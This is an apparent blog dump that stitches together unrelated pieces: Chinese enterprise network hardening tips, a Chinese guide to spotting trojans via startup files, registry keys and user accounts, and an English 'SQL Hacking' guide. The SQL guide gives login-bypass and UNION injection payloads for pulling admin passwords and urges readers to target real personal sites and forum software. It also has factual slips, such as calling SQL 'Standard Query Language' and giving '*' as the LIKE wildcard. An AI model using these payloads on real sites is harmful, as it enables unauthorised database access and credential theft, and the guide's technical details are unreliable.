  大型企业网可能同时支持四到五个服务器传送e-mail,有的企业网还会出现几十个其他服务器监视SMTP端口的情况。这些主机中很可能有潜在的邮件 服务器的攻击点。因此要逐个中断网络服务器来进行审查。若一个程序(或程序中的逻辑单元)作为一个window文件服务器在运行但是又不具有文件服务器作 用的,关掉该文件的共享协议。

  6、首先保护重要资源

  若一个内网上连了千万台(例如30000台)机子,那么要期望保持每一台主机都处于锁定状态和补丁状态是非常不现实的。大型企业网的安全考虑一般都有 择优问题。这样,首先要对服务器做效益分析评估,然后对内网的每一台网络服务器进行检查、分类、修补和强化工作。必定找出重要的网络服务器(例如实时跟踪 客户的服务器)并对他们进行限制管理。这样就能迅速准确地确定企业最重要的资产,并做好在内网的定位和权限限制工作。

  7、建立可靠的无线访问

  审查网络,为实现无线访问建立基础。排除无意义的无线访问点,确保无线网络访问的强制性和可利用性,并提供安全的无线访问接口。将访问点置于边界防火墙之外,并允许用户通过VPN技术进行访问。

  8、建立安全过客访问

  对于过客不必给予其公开访问内网的权限。许多安全技术人员执行的“内部无Internet访问”的策略,使得员工给客户一些非法的访问权限,导致了内网实时跟踪的困难。因此,须在边界防火墙之外建立过客访问网络块。

  9、创建虚拟边界防护

  主机是被攻击的主要对象。与其努力使所有主机不遭攻击(这是不可能的),还不如在如何使攻击者无法通过受攻击的主机来攻击内网方面努力。于是必须解决 企业网络的使用和在企业经营范围建立虚拟边界防护这个问题。这样,如果一个市场用户的客户机被侵入了,攻击者也不会由此而进入到公司的R&D。因 此要实现公司R&D与市场之间的访问权限控制。大家都知道怎样建立互联网与内网之间的边界防火墙防护,现在也应该意识到建立网上不同商业用户群之 间的边界防护。

  10、可靠的安全决策

  网络用户也存在着安全隐患。有的用户或许对网络安全知识非常欠缺,例如不知道RADIUS和TACACS之间的不同,或不知道代理网关和分组过滤防火 墙之间的不同等等,但是他们作为公司的合作者,也是网络的使用者。因此企业网就要让这些用户也容易使用,这样才能引导他们自动的响应网络安全策略。

  另外,在技术上,采用安全交换机、重要数据的备份、使用代理网关、确保操作系统的安全、使用主机防护系统和入侵检测系统等等措施也不可缺少

教你找到电脑中隐藏的入侵的黑手


也许会遇到这样的情况:
  
  计算机突然死机,有时又自动重新启动,无端端的少了些文件,发现桌面刷新慢,没有运行什么大的程序,硬盘却在拼命的读写,系统也莫明其妙地对软驱进行搜索,杀毒软件和防火墙报警,发现系统的速度越来越慢,这时候你就要小心了.
  
  第一时间反应(养成一个好的习惯往碗可以减少所受的损失):用CTRL+ALT+DEL调出任务表,查看有什么程序在运行,如发现陌生的程序就要多加 注意,一般来说,凡是在任务管理器上的程序都不会对系统的基本运行照成负面影响(注意:这里说的是基本运行,先和大家说明白,关于这条我是在网络上关于这 个研究的结果),所以大家可以关闭一些可疑的程序来看看,发现一些不正常的情况恢复了正常,那么就可以初步确定是中了木马了,发现有多个名字相同的程序在 运行,而且可能会随时间的增加而增多,这也是一种可疑的现象也要特别注意,你这时是在连入Internet网或是局域网后才发现这些现象的话,不要怀疑, 动手查看一下吧!,(注:也有可能是其它一些病毒在作怪)
  
  1 先升级杀毒软件到最新,对系统进行全面的检查扫描.
  
  2 点击工具→文件夹选项→查看 把隐藏受保护的操作系统文件(推荐)和隐藏已知文件类型的扩展名 这两项前面的勾去掉,以方便查看.
  
  3 查看Windows目录下的WIN.INI文件中开头的几行:
   [WINDOWS]
   load=
   ren=
   这里放的是启动Windows自动执行的程序,可以看看对比对比一下.
  
  4 查看Windows目录下的SYSTEM.INI文件中的这几行:
   [386Enh]
   device=
   这里是放置系统本身和外加的驱动程序。外加的驱动程序一般都用全路径,如:
   device=c:\windows\system32\tianyangdemeng.exe(这里只是打个比方)
  
  5 查看开始菜单中的【程序】→【启动】。
   这里放的也是启动Windows自动执行的程序,如果有的话,它就放在C:\Windows\Start Menu\Programs\中,将它保存在较安全的地方后再删除,需要恢复时在拿出来恢复即可。
 6 在开始】→【运行】中输入"MSCONFIG"查看是否有可疑的启动项,你也许会问,前面不是说了吗?其实,这两种方法是不同的,你分别用这两个方法查看一下就会发现不同了,至于要说更深入点,说实在话,我也不知道.呵呵不要笑话,希望高手出来解答一下!
  
  7 查看注册表,在【开始】→【运行】中输入“REGEDIT”。
  
  先对注册表进行备份,才对注册查看。(一定要养成一个习惯,在修改木文件时,对自己没有把握的需要先进行备份)

  查看 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices和Run项,看看有没有可疑的程序.
  查看 HKEY_CLASSES_ROOT\EXEFILE\SHELL\OPEN\COMMAND,看看是否有.EXE文件关联的木马,正确值为"%1"%*
  查看 HKEY_CLASSES_ROOT\INFFILE\SHELL\OPEN\COMMAND,看看是否有.INF文件关联的木马,正确值为"SYSTEM ROOT%\SYSTEM32\NOTEPAD.EXE%1
  查看 HKEY_CLASSES_ROOT\TXTFILE\SHELL\OPEN\COMMAND,看看是否有.TXT文件关联的木马,正确值为%SYSTEM ROOT%\SYSTEM32\NOTEPAD.EXE%1
  启动CMD,输入NETSTAT -AN 查看有没有异常的端口.
  
  8 Windows中的执行文件.exe、.com、.dll ……它们都有可能是黑客放置的病毒或是黑客病毒的携带者。在系统正常的时候,把以上文件做一个备份,到需要的时候就可以写回去!
  
  9 在Windows目录下,看看有无一个名为Winstart.bat的文件。这个文件也是与Autoexec.bat类似的一个自动批处理文件,不过,它 只能在Windows工作而不能在DOS下使用。仔细看看有没有什么你不知道的驱动程序,把它记录下来,到百度查一下,一般这个自动批处理文件是不会被用 到的.(只能凭经验判断了)  10 查看c:\autoexec.bat与c:\config.sys,这两个文件里有一些系统所需的驱动程序。看看有没有什么可疑的驱动程序.
  
  11 右击【我的电脑】→事件查看器 查看安全日志,看看里面有没有可疑的内容.
  
  12 在CMD下输入NET USER 看看有没有可疑的用户,出现自己不曾设立的用户,马上用NET USER ABCD /DEL 把它删除(这里的ABCD是用户名,只要把它改成想要删除的用户就行了,也可去下个检查用户克隆器查看和其它一切能帮助到你的工具,有些黑客建立的用户用 一般方法是看不见的,大家就要注意了)

Tuesday, December 9, 2008

Port 53 vuln

from wired:source

Tuesday, December 2, 2008

Complete SQL H4xxing guide

***************
SQL Hacking
***************

The step-by-step article for learning how to SQL inject
Written by: Xenon

***************

Q. What is SQL?

A. I believe strongly in knowing what your doing is, rather than knowing everything about it. SQL is an abbreviation for the Standard Query Language.

As we look at the history of the internet, we see insecure HTTP ports, open to legal intrusion, then the secured ones, the sites with logins, and social sites that store information.
Where does all the information we fill in forms get stored? In a .txt file? I don't think so. All one would need to do is open it to retrieve all info. Besides, how could one extract particular data, and not the whole database?


Welcome to Databasing. A few common DB softwares are MySQL, MSSQL (Microsoft SQL - MS ACCESS), PostgreSQL, Oracle.
These softwares are manipulated and read by PHP coding. The PHP code sends a syntax to the DB to work on. The syntax remains more or less Standard, for all these softares, hence called SQL.

See this:



$info=mysql_result("SELECT * FROM information WHERE username='Alex' ");

It is highly recommended that one knows basic SQL before one hacks, so I have decided to include a few common queries in the article.

The SELECT query:

Like the one above, the SELECT retrieves data.

A table contains rows and columns.
Each column has a type of data, and each row different entries. Like so:

TABLE "INFORMATION"

username | password
admin root
alex user


So with the unless we give a parameter, the SELECT would retrieve the entire table.
Hence, the parameter.

WHERE:
WHERE username='Alex"
would extract:
username=Alex , password=user.

One or more parameters can be given like:
WHERE some1=this OR some2=this2

or

WHERE some1-this AND some2=this2

The OR checks for just one TRUE condition,
the AND for two TRUE conditions

LIKE: Seen in search engines.

SELECT * FROM information WHERE username LIKE 'al*'
* is the SQL Wildcard. This would extract the same row as above. (admin starts with 'ad', not 'al')



The UNION ALL:
Union the result of two queries, i.e. combine the result of two SELECT statements into one.
Note, that combining with UNION has a condition, both the SELECT statements should have the same number of columns, even if some columns are 'null'

SELECT * FROM information WHERE username='admin' UNION ALL SELECT * FROM information WHERE username='alex'

In case you wonder what * is, its our wildcard, to extract all columns. Since both the selects are from the same table in this case, * would mean the same number of columns in both the cases, hence allowing the UNION ALL..


This query would give both the rows as the result.


The AS:
AS allows you to define another name, like an "A.K.A", or an alias, for a particular column, table, or even the entire query.
See this:

SELECT username AS user, password AS pass FROM information WHERE username='alex' AS result_final

The comma enables you to select more than one column from our DB.
So now,
user=username
pass=password

and the whole data returned = result_final

Now, if the PHP refers to user, it will show the value of the original username.


NOTE:While SQL hacking, when a variable is given an alias, the programmer probably used that alias later, so your UNION ALL should use the same aliases to not give an error and show the data.


SQL Hacking:
Well the basic fundamental is to not hack our DB software, but the programmers vulnerable PHP that uses the DB.

All login forms add variables to the query so that the particular user is checked up.
This is done by GET or POST methods.

See this:

SELECT * FROM users WHERE username='".$username."'

Now we hack the SQL like this:

Put the value of $username in the form, as:
user' OR 'a'='a

So the query will now be processed like:

SELECT * FROM users WHERE username='user' OR 'a'='a'

For the password, do the same.

This will return all the usernames and password for character 'a' is always equal to itself.
We used 'a'='a to dodge the open/close inverted commas.

Sometimes, one could comment out the rest of the statement that PHP adds, by using SQL comments like:
/*
/**
//
--

Get to know your SQL Software, and google for its syntax.

Another SQL Hack would be:
Found in blogs.

See this:

SELECT topic AS content FROM info WHERE topic_number=1

Obviously, as the users click different topics, the value of topic_number changes. So topic_number is injectable. (Not always the case, SQL Hacks can be protected against by cautious programmers)

The obvious injection would be:

SELECT topic AS content, postedby AS poster, email FROM info WHERE topic_number=0 UNION ALL SELECT user AS content, password AS poster, null FROM users WHERE id=1

EXPLAINATION:

We keep same aliases for the columns, so the queries merge good.
Notice the null.

Its to keep the number of columns the same so that the union is successful. At the same time, email is unioned with null or nothing.

WHERE id=1 works on the presumption that the first user registered is always the admin, and his user id number is in the column named 'id'.



***************
TIPS
***************

1. Hunt down error messages that give you table names, column names, the aliases used, etc. THIS IS A NECESSITY!

2. Check out the target's site for PHP forms and variables that you give values to. Look at the URLs as you navigate.

3. Learning SQL helps!

4. You need practise and be familiar with the site. This is why the easiest sites to hack need a week at least, to be familiar with all the variables and column and table names.

5. Try personal sites, before attempting to hack IP.Boards and vBulletins.

6. For common scripts, download the script, hunt the vulnerabilities down by looking at the source,

7. Be patient. It takes time to hack databases, even for the simplest sites.

8. Don't get frustrated with large errors. Copy into a text editor, make font enjoyable, and read through the errors.

9. Never target one page on the site. See all scripts. Different errors give different table names.

10. Google for vulnerabilities in common software, syntax for a DB software, articles, study the site pattern, and be bold enough to guess column names, like 'id'.






---

Remember. 11% websites on the net are vulnerable to SQL injections.

11% is a huge figure, considering the number of websites out there.

---
source from 1,2

no tech h4x

just some information i found and i dump into my blog

here

list
or
same list

the site